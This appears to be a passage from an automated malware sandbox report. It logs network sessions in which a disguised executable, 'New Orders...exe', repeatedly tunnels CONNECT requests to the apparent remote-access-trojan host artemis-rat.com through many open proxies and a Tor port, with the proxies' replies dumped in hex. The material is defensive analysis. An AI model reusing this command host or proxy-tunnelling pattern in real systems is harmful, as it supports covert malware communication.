                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.070494890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.773363113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.476480007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.165505886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.273308992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:21.460645914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1377192.168.2.954021201.71.2.1039997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.486377954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.106594086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.930821896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.441719055 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1378192.168.2.95407672.10.160.90295177672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.486516953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.962424994 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1379192.168.2.95397537.235.53.20867897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.494682074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.806219101 CET339INHTTP/1.1 403 Forbidden
                                                                                        Server: squid/4.7
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 5
                                                                                        X-Squid-Error: TCP_RESET 0
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
                                                                                        X-Cache: MISS from proxy.wakoopa.com
                                                                                        Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 72 65 73 65 74
                                                                                        Data Ascii: reset


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1380192.168.2.953999213.19.205.18543217672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.494729996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1381192.168.2.953988130.162.213.17580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.499274969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.342976093 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1382192.168.2.953963193.124.189.13807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.506370068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.843547106 CET361INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 150
                                                                                        Connection: close
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1383192.168.2.9540148.217.143.187156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.506401062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1384192.168.2.95405759.6.26.121807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.506869078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.809851885 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1385192.168.2.95402858.234.116.19781937672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.506977081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1386192.168.2.95404291.134.140.160573207672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.507270098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.273287058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.273435116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.179692030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.976588011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.773277044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.664014101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:08.164045095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:23.069967985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1387192.168.2.954054157.185.173.217265897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.512236118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1388192.168.2.954044125.122.26.24210807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.513493061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1389192.168.2.954087163.172.144.132163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.513734102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.273307085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.164812088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.070478916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.150487900 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1390192.168.2.951560103.60.161.1880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.514714956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.949107885 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1391192.168.2.951736176.253.53.25807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.516007900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.005055904 CET736INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:18:30 GMT
                                                                                        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k
                                                                                        Content-Length: 530
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1392192.168.2.953436121.66.198.7641457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.516056061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1393192.168.2.951820176.197.144.15841537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.516325951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1394192.168.2.95401180.249.112.162807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.519221067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.917946100 CET343INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 182
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1395192.168.2.95407449.254.240.252210287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.519640923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.438806057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.327653885 CET39INHTTP/1.0 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1396192.168.2.954101103.166.141.74200747672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.519648075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
